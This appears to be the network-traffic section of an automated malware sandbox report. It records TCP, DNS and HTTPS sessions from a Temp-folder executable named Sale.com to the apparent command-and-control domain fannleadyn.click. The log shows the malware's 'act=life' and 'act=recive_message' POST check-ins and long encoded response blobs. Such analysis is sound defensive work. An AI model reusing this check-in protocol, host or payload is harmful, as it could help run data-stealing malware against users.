                                              Dec 24, 2024 08:58:42.282955885 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:42.302145004 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.306472063 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.306541920 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:42.306555986 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.313651085 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.313716888 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:42.313724995 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.313926935 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.316399097 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:42.316399097 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:42.316399097 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:42.374296904 CET49825443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:42.374342918 CET44349825104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.374432087 CET49825443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:42.374702930 CET49825443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:42.374717951 CET44349825104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.610975027 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:42.611007929 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:43.594175100 CET44349825104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:43.594425917 CET49825443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:43.595638990 CET49825443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:43.595659018 CET44349825104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:43.596605062 CET44349825104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:43.601511002 CET49825443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:43.601633072 CET49825443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:43.601710081 CET44349825104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:44.625468969 CET44349825104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:44.625777960 CET44349825104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:44.625967026 CET49825443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:44.661663055 CET49825443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:44.661739111 CET44349825104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:44.865886927 CET49832443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:44.865902901 CET44349832104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:44.865963936 CET49832443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:44.866394043 CET49832443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:44.866406918 CET44349832104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:46.085279942 CET44349832104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:46.085369110 CET49832443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:46.086824894 CET49832443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:46.086874962 CET44349832104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:46.087136984 CET44349832104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:46.090497017 CET49832443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:46.090653896 CET49832443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:46.090713978 CET44349832104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:46.090781927 CET49832443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:46.135318995 CET44349832104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:46.958066940 CET44349832104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:46.958345890 CET44349832104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:46.958462000 CET49832443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:46.958636999 CET49832443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:46.958655119 CET44349832104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:47.038697004 CET49838443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:47.038747072 CET44349838104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:47.038836002 CET49838443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:47.039170027 CET49838443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:47.039189100 CET44349838104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:48.258399963 CET44349838104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:48.258563042 CET49838443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:48.259860992 CET49838443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:48.259870052 CET44349838104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:48.260222912 CET44349838104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:48.261920929 CET49838443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:48.262069941 CET49838443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:48.262104988 CET44349838104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:48.262198925 CET49838443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:48.262207985 CET44349838104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:49.194869041 CET44349838104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:49.195113897 CET44349838104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:49.195286036 CET49838443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:49.195348978 CET49838443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:49.195372105 CET44349838104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:49.464438915 CET49845443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:49.464490891 CET44349845104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:49.464584112 CET49845443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:49.464955091 CET49845443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:49.464973927 CET44349845104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:50.677618980 CET44349845104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:50.677704096 CET49845443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:50.679426908 CET49845443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:50.679436922 CET44349845104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:50.679816008 CET44349845104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:50.681766033 CET49845443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:50.681925058 CET49845443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:50.681961060 CET44349845104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:51.444278002 CET44349845104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:51.444591045 CET44349845104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:51.444695950 CET49845443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:51.444850922 CET49845443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:51.444869041 CET44349845104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:51.466309071 CET49852443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:51.466423988 CET44349852104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:51.466582060 CET49852443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:51.467044115 CET49852443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:51.467072010 CET44349852104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:52.687508106 CET44349852104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:52.687695980 CET49852443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:52.688918114 CET49852443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:52.688937902 CET44349852104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:52.689361095 CET44349852104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:52.690500975 CET49852443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:52.690588951 CET49852443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:52.690598965 CET44349852104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:53.475756884 CET44349852104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:53.475964069 CET44349852104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:53.476052999 CET49852443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:53.476303101 CET49852443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:53.476325989 CET44349852104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:53.839082003 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:53.839118958 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:53.839207888 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:53.839632988 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:53.839643955 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:55.054713011 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:55.054858923 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:55.056412935 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:55.056427002 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:55.056759119 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:55.058974028 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:55.058974028 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:55.059027910 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:55.062486887 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:55.062539101 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:55.062688112 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:55.062742949 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:55.064253092 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:55.064301968 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:55.064855099 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:55.064892054 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:55.065057039 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:55.065092087 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:55.065097094 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:55.065109015 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:55.065243006 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:55.065275908 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:55.065298080 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:55.065529108 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:55.065573931 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:55.111330032 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:55.113595963 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:55.113632917 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:55.113648891 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:55.113667011 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:55.113691092 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:55.113706112 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:55.113759041 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:55.113785982 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:57.467057943 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:57.467344046 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:57.467526913 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:57.467626095 CET49860443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:57.467644930 CET44349860104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:57.474546909 CET49867443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:57.474664927 CET44349867104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:57.474777937 CET49867443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:57.475137949 CET49867443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:57.475173950 CET44349867104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:57.814440966 CET49867443192.168.2.6104.21.63.229

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 24, 2024 08:57:51.271648884 CET6047453192.168.2.61.1.1.1
                                              Dec 24, 2024 08:57:51.494652033 CET53604741.1.1.1192.168.2.6
                                              Dec 24, 2024 08:58:37.837393045 CET4994553192.168.2.61.1.1.1
                                              Dec 24, 2024 08:58:38.130964994 CET53499451.1.1.1192.168.2.6

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 24, 2024 08:57:51.271648884 CET192.168.2.61.1.1.10x9db7Standard query (0)wcCUGXykADNzZuDCbIFIvizjQpm.wcCUGXykADNzZuDCbIFIvizjQpmA (IP address)IN (0x0001)false
                                              Dec 24, 2024 08:58:37.837393045 CET192.168.2.61.1.1.10x337fStandard query (0)fannleadyn.clickA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 24, 2024 08:57:51.494652033 CET1.1.1.1192.168.2.60x9db7Name error (3)wcCUGXykADNzZuDCbIFIvizjQpm.wcCUGXykADNzZuDCbIFIvizjQpmnonenoneA (IP address)IN (0x0001)false
                                              Dec 24, 2024 08:58:38.130964994 CET1.1.1.1192.168.2.60x337fNo error (0)fannleadyn.click104.21.63.229A (IP address)IN (0x0001)false
                                              Dec 24, 2024 08:58:38.130964994 CET1.1.1.1192.168.2.60x337fNo error (0)fannleadyn.click172.67.172.94A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • fannleadyn.click

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.649812104.21.63.2294434512C:\Users\user\AppData\Local\Temp\370821\Sale.com
                                              TimestampBytes transferredDirectionData
                                              2024-12-24 07:58:39 UTC263OUTPOST /api HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Content-Length: 8
                                              Host: fannleadyn.click
                                              2024-12-24 07:58:39 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                              Data Ascii: act=life
                                              2024-12-24 07:58:40 UTC1121INHTTP/1.1 200 OK
                                              Date: Tue, 24 Dec 2024 07:58:39 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: PHPSESSID=3tcbcjrjofsmloil9jajq2sa2h; expires=Sat, 19 Apr 2025 01:45:18 GMT; Max-Age=9999999; path=/
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              X-Frame-Options: DENY
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8FQpG6kMqtHusjCINc5ZYRWOnM0Qsf45%2FqBC0DRg4GfZhi4zrhyTAw0esm2kCMgJbcmZYFfd0n4hP1OIEgvpxISRsp08512FzwfH%2B%2BHagvq4A7jS2F8YD4nnxM3X2oMtCbw4"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8f6f0c29bf624408-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1557&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1770770&cwnd=201&unsent_bytes=0&cid=448d3b5319695205&ts=768&x=0"
                                              2024-12-24 07:58:40 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                              Data Ascii: 2ok
                                              2024-12-24 07:58:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.649818104.21.63.2294434512C:\Users\user\AppData\Local\Temp\370821\Sale.com
                                              TimestampBytes transferredDirectionData
                                              2024-12-24 07:58:41 UTC264OUTPOST /api HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Content-Length: 76
                                              Host: fannleadyn.click
                                              2024-12-24 07:58:41 UTC76OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 6c 33 26 6a 3d 35 66 38 33 61 37 35 66 62 37 30 33 33 31 32 39 64 65 34 35 62 34 30 33 32 38 35 61 36 37 32 33
                                              Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--l3&j=5f83a75fb7033129de45b403285a6723
                                              2024-12-24 07:58:42 UTC1121INHTTP/1.1 200 OK
                                              Date: Tue, 24 Dec 2024 07:58:41 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: PHPSESSID=td6mlntjjtuue9nt746pld9afd; expires=Sat, 19 Apr 2025 01:45:20 GMT; Max-Age=9999999; path=/
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              X-Frame-Options: DENY
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oxwhf795SFiQi89BUuC86j7iE69QAySSfvKHdXdnfpLNK3HDgkL9XZV6jFa0aQtbG30r2b1xZ29CKJ9FFb4%2BfjV0PSE2McyPeVBapFWMJ%2FSF94MMDmA0GVt334Ud1qYD%2F1aH"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8f6f0c3628b00f5f-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1460&min_rtt=1451&rtt_var=564&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=976&delivery_rate=1908496&cwnd=234&unsent_bytes=0&cid=299b4e5e714b89a6&ts=768&x=0"
                                              2024-12-24 07:58:42 UTC248INData Raw: 31 63 62 62 0d 0a 67 64 56 58 55 73 52 36 55 44 6c 72 64 30 59 57 62 44 6a 70 2b 34 4f 56 4f 6d 79 42 33 4f 4d 4a 52 47 64 63 5a 55 70 39 49 50 33 36 39 79 46 77 2f 6b 35 38 47 78 67 53 5a 43 77 59 53 70 79 65 72 37 64 62 43 4b 50 6d 68 57 67 6f 46 44 6c 4a 61 41 74 4e 33 37 75 7a 4e 6a 36 33 48 33 77 62 44 67 39 6b 4c 44 64 44 79 35 37 74 74 77 42 4f 35 4c 61 42 61 43 67 46 50 51 34 6c 44 55 79 65 36 62 6b 77 4f 71 45 5a 4e 46 67 48 47 69 4e 7a 43 56 6d 44 6c 65 72 34 55 67 47 6a 38 4d 46 73 50 6b 56 6d 52 77 63 59 56 4a 7a 4d 74 43 51 35 35 67 64 38 51 6b 6b 53 4b 44 52 57 47 6f 69 65 34 66 6c 63 43 4f 71 30 69 32 45 67 42 44 67 50 4f 68 52 47 6c 65 6d 33 4d 7a 75 72 45 43 42 56 44 52 30 6f 64 51 4e 5a 79 39 65 68 38 45 42 4f 75 2f
                                              Data Ascii: 1cbbgdVXUsR6UDlrd0YWbDjp+4OVOmyB3OMJRGdcZUp9IP369yFw/k58GxgSZCwYSpyer7dbCKPmhWgoFDlJaAtN37uzNj63H3wbDg9kLDdDy57ttwBO5LaBaCgFPQ4lDUye6bkwOqEZNFgHGiNzCVmDler4UgGj8MFsPkVmRwcYVJzMtCQ55gd8QkkSKDRWGoie4flcCOq0i2EgBDgPOhRGlem3MzurECBVDR0odQNZy9eh8EBOu/
                                              2024-12-24 07:58:42 UTC1369INData Raw: 37 53 57 53 55 55 4c 78 49 6c 44 30 54 66 2f 50 6b 73 63 4b 45 55 63 67 4e 4a 48 53 68 36 43 31 6d 45 6e 75 44 33 53 67 48 6a 76 59 6c 6a 49 67 38 78 43 43 63 52 53 4a 6a 72 76 6a 49 2f 6f 52 41 30 56 41 70 56 61 6a 51 4a 51 73 76 42 6f 64 64 49 44 65 43 71 6a 48 70 6d 47 6e 41 65 61 42 68 4f 33 37 76 33 4d 7a 36 6e 46 54 4a 4a 41 52 34 76 63 52 78 52 67 70 54 73 39 31 55 45 37 4c 32 42 62 43 77 50 4d 51 30 73 45 6b 2b 5a 34 37 64 31 66 75 59 66 4b 68 74 52 56 51 64 78 48 6c 32 48 6a 36 50 4e 47 42 47 74 70 38 46 73 4b 6b 56 6d 52 79 41 61 51 5a 7a 6f 75 44 59 34 72 51 6f 79 53 51 38 59 49 57 59 49 58 34 57 54 34 75 56 53 41 4f 57 39 69 47 41 76 41 44 6b 44 61 46 45 43 6d 50 76 33 62 58 43 48 46 54 6c 58 41 77 49 6b 4e 42 45 55 6b 74 6e 6d 2b 78 68 57 6f
                                              Data Ascii: 7SWSUULxIlD0Tf/PkscKEUcgNJHSh6C1mEnuD3SgHjvYljIg8xCCcRSJjrvjI/oRA0VApVajQJQsvBoddIDeCqjHpmGnAeaBhO37v3Mz6nFTJJAR4vcRxRgpTs91UE7L2BbCwPMQ0sEk+Z47d1fuYfKhtRVQdxHl2Hj6PNGBGtp8FsKkVmRyAaQZzouDY4rQoySQ8YIWYIX4WT4uVSAOW9iGAvADkDaFECmPv3bXCHFTlXAwIkNBEUktnm+xhWo
                                              2024-12-24 07:58:42 UTC1369INData Raw: 6d 53 33 34 41 4d 46 38 61 33 38 6d 30 49 54 4f 73 57 67 64 59 42 78 73 6a 59 6b 35 46 78 59 43 68 38 46 52 4f 75 2f 36 4d 61 69 34 44 4c 41 67 6c 48 45 79 52 37 4c 49 36 4f 4b 59 59 50 31 34 4e 48 69 39 33 41 31 36 5a 6b 2b 48 2f 58 51 2f 70 74 4d 45 6c 5a 67 49 6d 52 33 42 66 63 34 6a 6f 39 51 41 7a 71 42 59 31 54 55 6b 4b 61 6d 31 4f 58 59 66 5a 75 62 64 56 42 75 61 37 6a 6d 6f 73 43 7a 73 4e 4a 42 64 4d 6e 50 47 34 4d 54 43 71 45 44 68 57 42 78 45 73 66 51 56 52 6a 5a 6e 67 2f 52 68 41 6f 37 6d 5a 4b 33 35 46 43 67 41 6b 45 6b 33 64 31 72 51 37 50 71 45 4f 63 6b 52 48 44 47 52 7a 41 68 72 54 32 65 33 2b 57 41 58 70 75 6f 46 73 4b 77 41 39 41 43 73 53 52 5a 58 74 73 44 45 38 72 78 55 30 57 77 34 52 49 57 59 4c 55 34 65 56 6f 62 6b 59 43 66 76 2b 32 53
                                              Data Ascii: mS34AMF8a38m0ITOsWgdYBxsjYk5FxYCh8FROu/6Mai4DLAglHEyR7LI6OKYYP14NHi93A16Zk+H/XQ/ptMElZgImR3Bfc4jo9QAzqBY1TUkKam1OXYfZubdVBua7jmosCzsNJBdMnPG4MTCqEDhWBxEsfQVRjZng/RhAo7mZK35FCgAkEk3d1rQ7PqEOckRHDGRzAhrT2e3+WAXpuoFsKwA9ACsSRZXtsDE8rxU0Ww4RIWYLU4eVobkYCfv+2S
                                              2024-12-24 07:58:42 UTC1369INData Raw: 52 33 42 66 53 35 62 78 75 54 73 35 71 78 34 36 58 41 63 59 4c 33 49 46 58 59 79 66 37 50 39 56 43 2b 43 2f 68 57 45 30 42 6a 55 4e 4a 52 55 43 30 61 4f 77 4c 58 44 2b 57 42 56 58 49 41 55 2f 5a 68 67 61 6c 4e 66 34 74 31 38 43 6f 2b 62 42 61 43 6b 4d 4d 51 38 67 45 45 32 62 37 62 45 7a 50 61 4d 58 4f 45 6b 42 47 79 6c 2f 41 56 47 5a 6d 65 7a 7a 56 41 72 72 74 59 73 72 61 45 55 35 48 32 68 48 41 71 72 75 75 44 55 7a 73 46 67 74 46 52 42 56 49 33 68 4f 41 73 75 56 37 2f 64 58 41 75 2b 31 69 57 6f 71 43 7a 6b 43 49 52 64 4b 6a 65 4b 7a 50 54 47 6f 46 7a 4e 66 44 42 41 67 63 77 70 63 68 4e 6d 76 74 31 38 57 6f 2b 62 42 52 41 45 77 66 43 59 53 58 31 33 52 2b 76 63 79 50 4f 5a 41 63 6c 63 4b 47 53 78 37 43 46 4f 48 6b 2b 6a 38 56 41 58 6e 73 6f 68 75 49 41 51
                                              Data Ascii: R3BfS5bxuTs5qx46XAcYL3IFXYyf7P9VC+C/hWE0BjUNJRUC0aOwLXD+WBVXIAU/ZhgalNf4t18Co+bBaCkMMQ8gEE2b7bEzPaMXOEkBGyl/AVGZmezzVArrtYsraEU5H2hHAqruuDUzsFgtFRBVI3hOAsuV7/dXAu+1iWoqCzkCIRdKjeKzPTGoFzNfDBAgcwpchNmvt18Wo+bBRAEwfCYSX13R+vcyPOZAclcKGSx7CFOHk+j8VAXnsohuIAQ
                                              2024-12-24 07:58:42 UTC1369INData Raw: 55 57 57 38 62 6b 34 50 36 34 51 4f 31 6f 4e 45 43 6c 79 41 6c 43 4b 6e 75 2f 35 55 45 36 74 2f 6f 5a 7a 5a 6c 31 2b 4a 6a 67 45 55 49 6e 75 6c 6a 67 2f 35 67 64 38 51 6b 6b 53 4b 44 52 57 47 6f 4b 4c 35 66 70 4b 42 2b 53 77 6a 6d 67 30 42 44 4d 4d 4f 68 68 4e 6d 2b 53 37 4d 7a 2b 67 47 54 64 52 42 52 49 68 66 77 46 57 79 39 65 68 38 45 42 4f 75 2f 36 76 59 44 55 53 50 51 6b 6a 43 56 6e 66 2f 50 6b 73 63 4b 45 55 63 67 4e 4a 46 69 39 2f 43 6c 71 48 6d 65 58 36 57 42 7a 73 75 59 5a 69 4c 52 63 30 41 43 38 55 53 70 54 73 73 53 63 38 71 41 6f 33 53 52 74 56 61 6a 51 4a 51 73 76 42 6f 63 46 66 48 76 4f 39 77 31 6f 77 42 69 67 4d 4a 52 4d 43 67 4b 32 75 64 54 65 71 57 47 6f 62 44 78 6f 74 64 77 46 62 67 70 58 73 38 6c 45 4c 34 72 69 46 59 53 77 46 4f 41 45 70
                                              Data Ascii: UWW8bk4P64QO1oNEClyAlCKnu/5UE6t/oZzZl1+JjgEUInuljg/5gd8QkkSKDRWGoKL5fpKB+Swjmg0BDMMOhhNm+S7Mz+gGTdRBRIhfwFWy9eh8EBOu/6vYDUSPQkjCVnf/PkscKEUcgNJFi9/ClqHmeX6WBzsuYZiLRc0AC8USpTssSc8qAo3SRtVajQJQsvBocFfHvO9w1owBigMJRMCgK2udTeqWGobDxotdwFbgpXs8lEL4riFYSwFOAEp
